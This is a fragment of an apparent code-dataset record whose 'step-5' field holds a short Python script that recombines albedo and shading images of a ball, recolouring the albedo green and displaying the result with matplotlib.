"step-5": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nball = plt.imread('ball.png')\nalbedo = plt.imread('ball_albedo.png')\nshading = cv2.cvtColor(plt.imread('ball_shading.png'), cv2.COLOR_GRAY2RGB)\n\nx,y,z = np.where(albedo != 0)\nprint('Albedo:', albedo[x[0],y[0]])\nprint(\"Albedo in RGB space:\", albedo[x[0],y[0]]*255)\n\n# conversion of shading to RGB mapped the values to [0,1], therefore (0,255,0) = (0,1,0)\nalbedo[np.where(albedo[:,:,] != (0,0,0))[:-1]] = (0,1.,0)\n\nplt.subplot(1,2,1)\nplt.imshow(ball)\nplt.subplot(1,2,2)\nplt.imshow(albedo * shading)\n\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |